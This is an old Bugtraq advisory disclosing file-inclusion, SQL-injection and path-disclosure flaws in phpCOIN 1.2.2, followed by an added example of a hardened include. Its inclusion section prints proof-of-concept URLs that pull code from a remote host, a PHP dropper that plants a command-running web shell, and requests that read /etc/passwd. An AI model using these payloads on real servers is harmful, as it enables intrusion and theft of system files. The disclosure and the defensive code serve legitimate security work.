Message-ID: <20051213020818.23681.qmail@securityfocus.com>
Date: 13 Dec 2005 02:08:18 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: phpCOIN 1.2.2 multiple vulnerabilities


phpCOIN 1.2.2 arbitrary remote/local inclusion / blind SQL injection / path disclosure

software:
site: http://www.phpcoin.com/
description: "a free software package originally designed for web-hosting resellers
to handle clients, orders, invoices, notes and helpdesk, but no longer limited to
hosting resellers. phpCOIN is used by over twenty-five thousand people worldwide*,
including web-hosts, designers, lawyers, accountants, and a school band"

i) arbitrary remote/local inclusion:

vulnerable code in coin_includes/db.php at lines 30-39:

...
# Determine Database and include proper class file
	switch($_DBCFG['dbms'])
	{
		case "mysql":
			require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
			break;
		default:
			require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
			break;
	}
...


if register_globals is on and allow_url_fopen is on,
you can include an arbitrary file from a remote location, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]

on the remote location you have this code in http://[remote_location]/db_mysql.php/index.html:

<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>

then you launch commands:

http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd

if register_globals is on and magic_quotes_gpc is off, you can include an arbitrary file
from local resources, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00

exploit tool here:
http://rgod.altervista.org/phpcoin_122_incl_xpl.html


ii) if magic_quotes_gpc off -> SQL injection through cookies:

exploit code here:
http://rgod.altervista.org/phpcoin_122_sql_xpl.html


iii) path disclosure, simply:

http://[target]/[path]/config.php

because in coin_includes/db.php $_CCFG['_PKG_PATH_DBSE'] is not defined


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/phpcoin122.html
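
A hardened form of the include from section i), as an added example that is not phpCOIN code and not part of the original advisory: it refuses requests that carry the configuration array names as input, and builds the driver path only from an allowlisted file name under a fixed directory. The function names, the temporary driver directory and the sample request are constructed for illustration.

```php
<?php
// Added example, not phpCOIN code. Function names are hypothetical.

// True when the request carries a parameter named like a config array,
// which register_globals would otherwise turn into $_CCFG / $_DBCFG.
function request_shadows_config(array $get, array $post, array $cookie): bool
{
    foreach (['_CCFG', '_DBCFG'] as $name) {
        if (isset($get[$name]) || isset($post[$name]) || isset($cookie[$name])) {
            return true;
        }
    }
    return false;
}

// Map the configured dbms to a literal file name and confirm the resolved
// path stays inside the driver directory.
function db_class_file(string $dbms, string $driverDir): string
{
    $drivers = ['mysql' => 'db_mysql.php'];        // allowlist of driver files
    $name = $drivers[$dbms] ?? $drivers['mysql'];  // same default as the original switch
    $base = realpath($driverDir);
    $file = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('driver file not found under driver directory');
    }
    return $file;
}

// Constructed demo: a temporary directory stands in for the real driver directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'coin_dbse_demo';
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'db_mysql.php', "<?php // stub driver\n");

// Constructed request with the parameter shape used in the PoC URLs above.
$get = ['_CCFG' => ['_PKG_PATH_DBSE' => 'http://remote.invalid/']];
var_dump(request_shadows_config($get, [], []));              // shadowing request
var_dump(request_shadows_config(['page' => 'home'], [], [])); // ordinary request

require_once db_class_file('mysql', $dir);  // path built from fixed values only

// A base directory that is a URL or does not resolve locally is rejected.
foreach (['http://remote.invalid/', $dir . '/../does-not-exist'] as $bad) {
    try {
        db_class_file('mysql', $bad);
    } catch (RuntimeException $e) {
        echo "rejected: $bad\n";
    }
}
```

In a deployment the driver directory would be a constant derived from the script's own location (for example from __DIR__), so no request-controlled value ever reaches require_once.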





